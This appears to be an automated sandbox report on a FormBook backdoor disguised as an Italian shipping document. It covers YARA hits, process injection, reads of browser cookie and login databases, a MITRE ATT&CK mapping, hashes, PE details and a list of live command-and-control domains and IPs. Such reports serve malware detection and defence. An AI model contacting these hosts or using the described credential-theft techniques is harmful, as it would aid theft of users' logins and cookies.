            Source: Yara matchFile source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_XP
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_XPe
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_VISTA
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_7
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 2 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 16 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 312 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            Behavior Graph (ID: 1515429; Sample: AWB_5771388044 Documenti di...; Startdate: 22/09/2024; Architecture: WINDOWS; Score: 100)
            Process chain: AWB_5771388044 Documenti di spedizione.exe -> svchost.exe (started) -> pSySrLvnviNdEH.exe (injected) -> taskkill.exe (started) -> firefox.exe (started)
            Network contacts of pSySrLvnviNdEH.exe: www.uburn.xyz (67.223.117.189, VIMRO-AS15189US, United States), www.trapkitten.website (195.161.68.8, RTCOMM-ASRU, Russian Federation), 6 other IPs or domains

            Source | Detection | Scanner | Label | Link
            AWB_5771388044 Documenti di spedizione.exe | 68% | ReversingLabs | Win32.Backdoor.FormBook |
            AWB_5771388044 Documenti di spedizione.exe | 47% | Virustotal | | Browse
            AWB_5771388044 Documenti di spedizione.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            tempatmudisini01.click | 5% | Virustotal | | Browse
            www.palcoconnector.net | 0% | Virustotal | | Browse
            dns.ladipage.com | 0% | Virustotal | | Browse
            wdeb18.top | 0% | Virustotal | | Browse
            www.trapkitten.website | 2% | Virustotal | | Browse
            natroredirect.natrocdn.com | 0% | Virustotal | | Browse
            www.wdeb18.top | 2% | Virustotal | | Browse
            www.tmstore.click | 2% | Virustotal | | Browse
            Source | Detection | Scanner | Label | Link
            http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%20%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%VirustotalBrowse
            http://www.sppsuperplast.online/og3c/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%VirustotalBrowse
            https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://www.albero-dveri.online0%Avira URL Cloudsafe
            http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net0%VirustotalBrowse
            http://www.sppsuperplast.online/og3c/1%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%VirustotalBrowse
            http://www.palcoconnector.net/c45k/0%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_0%Avira URL Cloudsafe
            https://jino.ru0%Avira URL Cloudsafe
            http://www.wdeb18.top/66vh/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            http://www.palcoconnector.net/display.cfm0%Avira URL Cloudsafe
            http://www.wdeb18.top/66vh/1%VirustotalBrowse
            https://delivery.consentmanager.net0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://www.palcoconnector.net/c45k/1%VirustotalBrowse
            https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
            http://www.uburn.xyz/unks/0%Avira URL Cloudsafe
            http://www.trapkitten.website/0dae/0%Avira URL Cloudsafe
            https://jino.ru0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%VirustotalBrowse
            http://www.uburn.xyz/unks/1%VirustotalBrowse
            http://www.Palcoconnector.net0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu0%Avira URL Cloudsafe
            https://www.tmstore.click/pk64/?4rl8h=D2L0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://www.Palcoconnector.net0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            http://www.2bhp.com/znmp/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| tempatmudisini01.click | 103.21.221.4 | true | false | | unknown |
| www.palcoconnector.net | 208.91.197.27 | true | true | | unknown |
| www.albero-dveri.online | 194.58.112.174 | true | true | | unknown |
| dns.ladipage.com | 54.179.173.60 | true | true | | unknown |
| www.uburn.xyz | 67.223.117.189 | true | true | | unknown |
| wdeb18.top | 206.119.82.147 | true | true | | unknown |
| www.trapkitten.website | 195.161.68.8 | true | true | | unknown |
| www.2bhp.com | 81.88.63.46 | true | true | | unknown |
| natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown |
| www.wdeb18.top | unknown | unknown | true | | unknown |
| www.tmstore.click | unknown | unknown | true | | unknown |
| www.tempatmudisini01.click | unknown | unknown | true | | unknown |
| www.sppsuperplast.online | unknown | unknown | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.albero-dveri.online/vyk8/ | true | Avira URL Cloud: safe | unknown |
| http://www.sppsuperplast.online/og3c/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| http://www.palcoconnector.net/c45k/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| http://www.wdeb18.top/66vh/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| http://www.trapkitten.website/0dae/ | true | Avira URL Cloud: safe | unknown |
| http://www.uburn.xyz/unks/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| http://www.2bhp.com/znmp/ | true | Avira URL Cloud: safe | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
67.223.117.189 | www.uburn.xyz | United States | 15189 | VIMRO-AS15189US | true
206.119.82.147 | wdeb18.top | United States | 174 | COGENT-174US | true
208.91.197.27 | www.palcoconnector.net | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
81.88.63.46 | www.2bhp.com | Italy | 39729 | REGISTER-ASIT | true
195.161.68.8 | www.trapkitten.website | Russian Federation | 8342 | RTCOMM-ASRU | true
54.179.173.60 | dns.ladipage.com | United States | 16509 | AMAZON-02US | true
194.58.112.174 | www.albero-dveri.online | Russian Federation | 197695 | AS-REGRU | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1515429
                      Start date and time:2024-09-22 18:00:34 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 23s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:AWB_5771388044 Documenti di spedizione.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/2@9/8
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 92%
                      • Number of executed functions: 51
                      • Number of non-executed functions: 305
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:02:46 | API Interceptor | 5995264x Sleep call for process: taskkill.exe modified
                      Process:C:\Windows\SysWOW64\taskkill.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Process:C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):287232
                      Entropy (8bit):7.9957441252533
                      Encrypted:true
                      SSDEEP:6144:nJzqHXQ6MpNcJ6sETbfGoWIWTAn6SqY577/IavIqxToF3NScc+VEQ864ppXyyu1d:J6MPEJETbf+IWT46Sf577FvIb0t+VxTt
                      MD5:A9DDFED5C7303CC2FFA11D8168C14BEA
                      SHA1:B7F4CAB3A330A55487D92BC06AF19F51EADF3178
                      SHA-256:ED31C97A78753C930D7BC2B70B8AEAA2A0187E2F67126FC3D6B2EC366AD77CB3
                      SHA-512:D473F10539B9360D7B73BB76E15511E524367D55950C6B1910D62066F217D5EDB113A75BDF1F315F9B1FC5B488D2B9CCE55BF7F7F18E3A2E1939E3E3B0BB983D
                      Malicious:false
                      Reputation:low
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.56005110149538
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:AWB_5771388044 Documenti di spedizione.exe
                      File size:1'398'875 bytes
                      MD5:15fcfde4bcde8e7dce181856e02b1b24
                      SHA1:1e87dd4312940e1aa8c3844953a61bc095772418
                      SHA256:d53e08fc9d3d0153b73b816b38fed23a03f6fa94135ff483e4634d0141c9cbdd
                      SHA512:76bb5e9df29c04719fd2abede98a14981b5c9bfb7b82ef7f3cc2f940a9f4606004776c711dffbe58b3f8c27b95143806df76a401090bbbcebeaca4fb0c2ccc4a
                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCfGQ9QVK6dCMbJa/Bv1vcdkX4SLrWsZhc:7JZoQrbTFZY1iaCqjuB9vcerWsM
                      TLSH:D855F221FAC69036C1B327B19E7FF76A9A3D69360336D29727C81D211EA05417B29733
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                      Icon Hash:1733312925935517
                      Entrypoint:0x4165c1
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                      Instruction
                      call 00007FAA547F57EBh
                      jmp 00007FAA547EC65Eh
                      int3
                      int3
                      int3
                      int3
                      int3
                      push ebp
                      mov ebp, esp
                      push edi
                      push esi
                      mov esi, dword ptr [ebp+0Ch]
                      mov ecx, dword ptr [ebp+10h]
                      mov edi, dword ptr [ebp+08h]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007FAA547EC7DAh
                      cmp edi, eax
                      jc 00007FAA547EC976h
                      cmp ecx, 00000080h
                      jc 00007FAA547EC7EEh
                      cmp dword ptr [004A9724h], 00000000h
                      je 00007FAA547EC7E5h
                      push edi
                      push esi
                      and edi, 0Fh
                      and esi, 0Fh
                      cmp edi, esi
                      pop esi
                      pop edi
                      jne 00007FAA547EC7D7h
                      jmp 00007FAA547ECBB2h
                      test edi, 00000003h
                      jne 00007FAA547EC7E6h
                      shr ecx, 02h
                      and edx, 03h
                      cmp ecx, 08h
                      jc 00007FAA547EC7FBh
                      rep movsd
                      jmp dword ptr [00416740h+edx*4]
                      mov eax, edi
                      mov edx, 00000003h
                      sub ecx, 04h
                      jc 00007FAA547EC7DEh
                      and eax, 03h
                      add ecx, eax
                      jmp dword ptr [00416654h+eax*4]
                      jmp dword ptr [00416750h+ecx*4]
                      nop
                      jmp dword ptr [004166D4h+ecx*4]
                      nop
                      inc cx
                      add byte ptr [eax-4BFFBE9Ah], dl
                      inc cx
                      add byte ptr [ebx], ah
                      ror dword ptr [edx-75F877FAh], 1
                      inc esi
                      add dword ptr [eax+468A0147h], ecx
                      add al, cl
                      jmp 00007FAA56C64FD7h
                      add esi, 03h
                      add edi, 03h
                      cmp ecx, 08h
                      jc 00007FAA547EC79Eh
                      rep movsd
                      jmp dword ptr [00000000h+edx*4]
                      Programming Language:
                      • [ C ] VS2010 SP1 build 40219
                      • [C++] VS2010 SP1 build 40219
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2010 SP1 build 40219
                      • [RES] VS2010 SP1 build 40219
                      • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
